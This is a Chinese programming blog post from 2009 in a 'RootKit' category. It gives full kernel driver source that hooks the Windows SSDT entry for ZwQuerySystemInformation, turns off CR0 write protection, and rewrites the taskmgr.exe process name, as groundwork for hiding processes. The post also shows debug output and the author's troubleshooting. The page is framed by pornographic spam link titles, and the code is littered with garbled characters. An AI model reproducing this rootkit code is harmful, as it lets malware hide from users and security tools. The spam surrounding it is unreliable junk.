青青草原综合久久大伊人导航_色综合久久天天综合_日日噜噜夜夜狠狠久久丁香五月_热久久这里只有精品

S.l.e!ep.¢%

像打了激速一樣,以四倍的速度運(yùn)轉(zhuǎn),開心的工作
簡單、開放、平等的公司文化;尊重個(gè)性、自由與個(gè)人價(jià)值;
posts - 1098, comments - 335, trackbacks - 0, articles - 1
  C++博客 :: 首頁 :: 新隨筆 :: 聯(lián)系 :: 聚合  :: 管理

HOOK SSDT Hide Process (六)

Posted on 2009-10-26 19:10 S.l.e!ep.¢% 閱讀(348) 評論(0)  編輯 收藏 引用 所屬分類: RootKit
[資料] http://www.shnenglu.com/sleepwom/archive/2009/10/24/99375.html

HOOK SSDT Hide Process (五)?? R3 已經(jīng)知道 ZwQuerySystemInformation 函數(shù)用來 enum 進(jìn)程
那么現(xiàn)在看下 R0 的HOOK 函數(shù)實(shí)現(xiàn)先

從致是調(diào)用回 ntdll.dll? 中的 ZwQuerySystemInformation 函數(shù),取得返回值后,再把相關(guān)的數(shù)據(jù)過濾掉
編譯后運(yùn)行有問題,于是乎對程序作了一下修改,主要改了 MyZwQuerySystemInformation 函數(shù)
在判斷到進(jìn)程的名字是 taskmgr.exe 就把它改為 haha

#include?"ssdthook.h"

#pragma??pack(
1)

typedef?
struct?_SSDT_TABLE
{
??PVOID???ServiceTableBase;
??PULONG??ServiceCounterTableBase;
??ULONG???NumberOfService;
??ULONG???ParamTableBase;
}SSDT_TABLE,
*?PSSDT_TABLE;
#pragma?pack()

struct?_SYSTEM_THREADS
{
??LARGE_INTEGER???????????KernelTime;
??LARGE_INTEGER???????????UserTime;
??LARGE_INTEGER???????????CreateTime;
??ULONG???????????????????????????WaitTime;
??PVOID???????????????????????????StartAddress;
??CLIENT_ID???????????????????????ClientIs;
??KPRIORITY???????????????????????Priority;
??KPRIORITY???????????????????????BasePriority;
??ULONG???????????????????????????ContextSwitchCount;
??ULONG???????????????????????????ThreadState;
??KWAIT_REASON????????????WaitReason;
};


//===================================================
struct?_SYSTEM_PROCESSES
{
??ULONG???????????????????????????NextEntryDelta;
??ULONG???????????????????????????ThreadCount;
??ULONG???????????????????????????Reserved[
6];
??LARGE_INTEGER???????????CreateTime;
??LARGE_INTEGER???????????UserTime;
??LARGE_INTEGER???????????KernelTime;
??UNICODE_STRING??????????ProcessName;
??KPRIORITY???????????????????????BasePriority;
??ULONG???????????????????????????ProcessId;
??ULONG???????????????????????????InheritedFromProcessId;
??ULONG???????????????????????????HandleCount;
??ULONG???????????????????????????Reserved2[
2];
??VM_COUNTERS?????????????????????VmCounters;
??IO_COUNTERS?????????????????????IoCounters;?
//windows?2000?only
??struct?_SYSTEM_THREADS??????????Threads[1];
};

struct?_SYSTEM_PROCESSOR_TIMES
{
???LARGE_INTEGER??????????IdleTime;
???LARGE_INTEGER??????????KernelTime;
???LARGE_INTEGER??????????UserTime;
???LARGE_INTEGER??????????DpcTime;
???LARGE_INTEGER??????????InterruptTime;
???ULONG??????????????InterruptCount;
};

//======================================================
typedef?NTSTATUS?(__stdcall?*ZWQUERYSYSTEMINFORMATION)(
???IN?ULONG?SystemInformationClass,?
???IN?PVOID?SystemInformation,?
???IN?ULONG?SystemInformationLength,?
???OUT?PULONG?ReturnLength);

NTSTATUS?MyZwQuerySystemInformation(?
???IN?ULONG?SystemInformationClass,?
???IN?PVOID?SystemInformation,?
???IN?ULONG?SystemInformationLength,?
???OUT?PULONG?ReturnLength);

//定義全局變量
extern?"C"?extern?PSSDT_TABLE??KeServiceDescriptorTable;
ULONG??OldAddress;
ZWQUERYSYSTEMINFORMATION????????OldZwQuerySystemInformation;
PVOID?Base;

void?UnHook();

VOID?Unload?(IN?PDRIVER_OBJECT?pDriverObject)?
{
????????KdPrint((
"Enter?DriverUnload\n"));
????????UnHook();???
//?mark

}

NTSTATUS?MyZwQuerySystemInformation(IN?ULONG?SystemInformationClass,?
????????????????????????????????????IN?PVOID?SystemInformation,?
????????????????????????????????????IN?ULONG?SystemInformationLength,?
????????????????????????????????????OUT?PULONG?ReturnLength)?
//定義自己的Hook函數(shù)
{?
????
????NTSTATUS?rc;?
????UNICODE_STRING?process_name;
????
????RtlInitUnicodeString(
&process_name,?L"taskmgr.exe");
????
????rc?
=?(OldZwQuerySystemInformation)?(?
????????SystemInformationClass,?
????????SystemInformation,?
????????SystemInformationLength,?
????????ReturnLength);?
????
????
if(NT_SUCCESS(rc))?
????{
????????
if(5?==?SystemInformationClass)
????????{?
????????????
struct?_SYSTEM_PROCESSES?*curr?=?(struct?_SYSTEM_PROCESSES?*)SystemInformation;?
????????????
????????????
while(curr)
????????????{
????????????????
if?(RtlEqualUnicodeString(&process_name,?&curr->ProcessName,?1))
????????????????{
????????????????????????????????????????DbgPrint(
"before?%wZ\n",&process_name);?
????????????????????????????????????????RtlInitUnicodeString(
&(curr->ProcessName),?L"haha");??????????????????????????????????????????
????????????????????????????????????????DbgPrint(
"after?%wZ\n",&(curr->ProcessName));?


????????????????}?
//?if?(RtlEqualUnicodeString(&process_name,?&curr->ProcessName,?1))
????????????????

????????????????
if(curr->NextEntryDelta)
????????????????????curr?
=?(_SYSTEM_PROCESSES?*)((ULONG)curr?+?curr->NextEntryDelta);?
????????????????
else?
????????????????????curr?
=?NULL;

????????????}?
//while(curr)
????????????
????????}?
//?if(5?==?SystemInformationClass)
????????
????}
//?if(NT_SUCCESS(rc))
????
????
//?KdPrint(("HookZwQuerySystemInformation?is?Succeessfully.?\n"));
????return?rc;
}

VOID?Hook()

{

????????DbgPrint(
"Entry?Hook()\n");
????????OldAddress?
=(ULONG)KeServiceDescriptorTable->ServiceTableBase?+?4*0xAd;//用windbg反匯編查到zwquerysysteminformationde的ID號是0xADh
????????DbgPrint("KeServiceDescriptorTable->ServiceTableBase?is?:0x%0x\n",KeServiceDescriptorTable->ServiceTableBase);
????????
//保存原來函數(shù)的地址
????????OldZwQuerySystemInformation?=?(ZWQUERYSYSTEMINFORMATION)?*(ULONG?*)OldAddress;
????????DbgPrint(
"OldZwQuerySystemInformation?is?:0x%0x\n",?OldZwQuerySystemInformation);
????????DbgPrint(
"MyZwQuerySystemInformation?is?:0x%0x\n",?MyZwQuerySystemInformation);
????????
????????
//取消內(nèi)存寫保護(hù)
????????_asm
????????{?
????????cli
????????mov??eax,cr0
????????and??eax,not?10000h
????????mov??cr0,eax
????????}

????????
*(ULONG*)OldAddress?=(ULONG)?MyZwQuerySystemInformation;???????//mark???MyZwQuerySystemInformation;
????????
????????
//還原內(nèi)存寫保護(hù)
????????_asm
????????{
????????mov??eax,cr0
????????or???eax,10000h
????????mov??cr0,eax?
????????sti
????????}
}

void?UnHook()
{
??ULONG??Address;

??Address?
=(ULONG)?KeServiceDescriptorTable->ServiceTableBase?+0xAD*4;

??__asm
??{
????cli
????mov??eax,cr0
????and??eax,not?10000h
????mov??cr0,eax
??}

??
*(ULONG*)Address?=(ULONG)?OldZwQuerySystemInformation;

??__asm
??{??
????mov??eax,cr0
????or???eax,10000h
????mov??cr0,eax
????sti
??}

??DbgPrint(
"Unhook?leave!\n");
}

//========================驅(qū)動入口函數(shù)
extern?"C"?NTSTATUS?DriverEntry(IN?PDRIVER_OBJECT??pDriverObject,?IN?PUNICODE_STRING??pRegistryPath)
{

??DbgPrint(
"Entry?Hook?Function!\n");
??pDriverObject
->DriverUnload?=?Unload;
??Hook();
??DbgPrint(
"Leave?DriverEntry!\n");
??
return?STATUS_SUCCESS;
}?

運(yùn)行后, 事與愿違, 并沒有顯示 haha, 而是顯示為空
用 DebugView 顯示調(diào)試信息

Entry?Hook?Function!
Entry?Hook()
KeServiceDescriptorTable
->ServiceTableBase?is?:0x804e2d20
OldZwQuerySystemInformation?
is?:0x8057cc27
MyZwQuerySystemInformation?
is?:0xf8ed4080
Leave?DriverEntry
!
before?taskmgr.exe
after?haha

Q:為何在 taskmgr.exe 中會顯示為空?疑問中
采用 HOOK SSDT Hide Process (五)?
?中的程序跟蹤發(fā)現(xiàn),taskmgr.exe 的 imagename.buffer 的地址居然是 0xb049480
這個(gè)地址顯然不是應(yīng)用層的地址,后果然后是不讓訪問了

于是改成用 memcpy

DbgPrint("before 0x%X %d %wZ\n", &(curr->ProcessName), curr->ProcessName.Length, &(curr->ProcessName));
//RtlInitUnicodeString(&(curr->ProcessName), L"fdsf");
memcpy(curr->ProcessName.Buffer, L"_root_", 12);
DbgPrint("after 0x%X %d %wZ\n", &(curr->ProcessName), curr->ProcessName.Length, &(curr->ProcessName));

結(jié)果,運(yùn)行成功
taskmgr.exe 的 imagename 被成功修改為 _root_r.exe

產(chǎn)生新的問題:
Q:? RtlInitUnicodeString 對 UNICODE_STRING 賦值是會同時(shí)分配緩沖區(qū)的空間?這一點(diǎn)查了MSDN,沒看到有相關(guān)的說明
需要找時(shí)間去驗(yàn)證下
A:? RtlInitUnicodeString() 這個(gè)函數(shù)它并不是直接去修改內(nèi)存,而是重新分配一段緩沖區(qū),而這段緩沖區(qū)在離開函數(shù)后就無效了
??????而用戶傳進(jìn)來的?SystemInformation 指針,是一段連續(xù)的內(nèi)存空間


Q:???用戶區(qū)傳進(jìn)來的
SystemInformation 指針,是一段連續(xù)的內(nèi)存空間,也就是說, 如果修改了 IMAGENAME 的內(nèi)容,導(dǎo)致
原來 UNICODE_STRING.buffer 不足的話,那么需要把后面的 SystemInformation 都往后移?(這一點(diǎn)也需要找時(shí)間驗(yàn)證下)
比較保險(xiǎn)的做法是,先執(zhí)行系統(tǒng)的 ZwQuerySytemInformation 后,先把所有的 SystemInformation 都讀出來,然后再分別寫到
用戶傳進(jìn)來的 SystemInformation? 緩沖區(qū)。
A: 這個(gè)嘗試過,不過藍(lán)屏,需要找時(shí)間再仔細(xì)研究下
青青草原综合久久大伊人导航_色综合久久天天综合_日日噜噜夜夜狠狠久久丁香五月_热久久这里只有精品
  • <ins id="pjuwb"></ins>
    <blockquote id="pjuwb"><pre id="pjuwb"></pre></blockquote>
    <noscript id="pjuwb"></noscript>
          <sup id="pjuwb"><pre id="pjuwb"></pre></sup>
            <dd id="pjuwb"></dd>
            <abbr id="pjuwb"></abbr>
            欧美国产视频一区二区| 国产亚洲综合性久久久影院| 久久久精品日韩| 欧美日韩视频在线一区二区| 欧美国产另类| 依依成人综合视频| 欧美专区在线| 久久福利影视| 国产午夜精品视频免费不卡69堂| 99成人精品| 亚洲视频免费在线| 欧美日韩精品二区| 亚洲精品美女在线观看| 亚洲欧洲一区二区三区| 美女爽到呻吟久久久久| 欧美成人国产一区二区| 亚洲国产91| 欧美1级日本1级| 亚洲国产va精品久久久不卡综合| 亚洲国产成人tv| 开元免费观看欧美电视剧网站| 免费日本视频一区| 136国产福利精品导航| 久久亚洲午夜电影| 亚洲第一区在线| 99这里有精品| 鲁大师影院一区二区三区| 国产日韩在线播放| 欧美自拍丝袜亚洲| 久久综合五月天婷婷伊人| 永久免费毛片在线播放不卡| 久久综合综合久久综合| 欧美xxxx在线观看| 日韩视频精品在线| 欧美三级欧美一级| 亚洲欧美怡红院| 免费观看成人www动漫视频| 亚洲国产裸拍裸体视频在线观看乱了中文 | 久久精品国产久精国产爱| 久久久夜精品| 亚洲黄页视频免费观看| 欧美日韩黄视频| 欧美一区二区三区在线看 | 亚洲精品视频免费观看| 一区二区三区久久| 国产精品有限公司| 久久免费国产精品| 亚洲精品一二区| 性做久久久久久久免费看| 狠狠色丁香久久婷婷综合_中| 亚洲第一在线综合网站| 中文亚洲字幕| 韩日精品视频一区| 欧美精选午夜久久久乱码6080| 亚洲系列中文字幕| 欧美jizz19性欧美| 亚洲欧美中日韩| 亚洲丁香婷深爱综合| 欧美日韩一区二区三区在线 | 国产精品一区二区三区久久久| 久久久久久久尹人综合网亚洲| 日韩网站在线观看| 久久久av网站| 一区二区三区久久久| 精品69视频一区二区三区| 欧美日韩免费观看一区| 久久久久久亚洲精品不卡4k岛国| 99成人在线| 亚洲国产精品t66y| 久久久久久久高潮| 亚洲一区二区三区影院| 亚洲国产视频a| 国内精品福利| 国产精品每日更新在线播放网址| 蜜臀av性久久久久蜜臀aⅴ四虎| 亚洲一区日韩| 99re热这里只有精品免费视频| 能在线观看的日韩av| 午夜欧美不卡精品aaaaa| 日韩视频在线免费观看| 在线免费观看日韩欧美| 国产日韩欧美| 国产伦精品一区二区三区在线观看 | 欧美国产日韩xxxxx| 欧美在线视频一区二区三区| 一区二区三区成人| 亚洲人成啪啪网站| 欧美黄在线观看| 免费日韩视频| 男女精品网站| 男女激情视频一区| 噜噜噜91成人网| 老妇喷水一区二区三区| 久久精品成人一区二区三区蜜臀| 亚洲欧美欧美一区二区三区| 欧美成人免费网| 另类综合日韩欧美亚洲| 久久精品一区| 久久久久久久久伊人| 欧美综合激情网| 欧美在线精品一区| 欧美有码视频| 久久久亚洲国产美女国产盗摄| 久久久国产一区二区| 久久国产福利国产秒拍| 久久电影一区| 久久久久欧美精品| 米奇777在线欧美播放| 免费成人性网站| 欧美大片va欧美在线播放| 免费在线国产精品| 欧美剧在线观看| 国产精品啊啊啊| 国产精品视频在线观看| 国产日本欧洲亚洲| 狠狠色综合色区| 亚洲国产日韩欧美| 一卡二卡3卡四卡高清精品视频| 一区二区三区四区蜜桃| 亚洲欧美激情诱惑| 久久久免费av| 亚洲第一页中文字幕| 日韩视频―中文字幕| 亚洲少妇在线| 久久精品一区二区三区四区| 免费在线成人| 国产精品久久网| 在线成人免费视频| 在线中文字幕不卡| 久久精品91| 亚洲电影专区| 亚洲综合大片69999| 久久久999国产| 欧美女主播在线| 国产一区二区三区免费观看| 亚洲国产成人精品久久久国产成人一区 | 国产综合色在线| 日韩视频在线一区| 久久国产主播精品| 亚洲国产国产亚洲一二三| 中文日韩电影网站| 久久青草久久| 国产精品久久久久久妇女6080| 红桃视频国产一区| 亚洲午夜av电影| 免费久久久一本精品久久区| 一区二区高清在线观看| 久久九九电影| 国产精品久久久久久久久久直播 | 亚洲精品在线观| 久久国产精品免费一区| 亚洲精品视频免费| 久久久久久久久久久久久久一区| 欧美三级午夜理伦三级中文幕 | 欧美日韩国产影院| 一区二区三区无毛| 亚洲欧美在线免费| 亚洲国产综合视频在线观看| 亚洲欧美日韩精品久久久| 欧美激情网友自拍| 136国产福利精品导航| 欧美有码视频| 亚洲视频在线观看网站| 欧美成熟视频| 亚洲高清网站| 麻豆精品传媒视频| 欧美在线啊v| 国产伦理精品不卡| 亚洲综合第一| 99精品视频免费观看视频| 免费亚洲电影| 亚洲欧美99| 国产精品免费观看视频| 在线一区二区三区四区五区| 亚洲狠狠丁香婷婷综合久久久| 久久久噜噜噜| 伊人久久婷婷色综合98网| 久久久久国产精品www| 亚洲综合色自拍一区| 国产精品久久久久久久第一福利| 一本到高清视频免费精品| 亚洲第一黄网| 欧美成人中文字幕| 亚洲精品久久久蜜桃| 亚洲高清影视| 欧美激情亚洲国产| 亚洲精品资源美女情侣酒店| 亚洲国产裸拍裸体视频在线观看乱了中文| 久久久999国产| 在线免费观看日韩欧美| 免费永久网站黄欧美| 久久先锋资源| 亚洲激情电影中文字幕| 亚洲第一区在线| 欧美精品日韩精品| 亚洲一级一区| 亚洲欧美成人一区二区在线电影| 国产香蕉97碰碰久久人人| 久久国产加勒比精品无码| 久久av一区二区三区|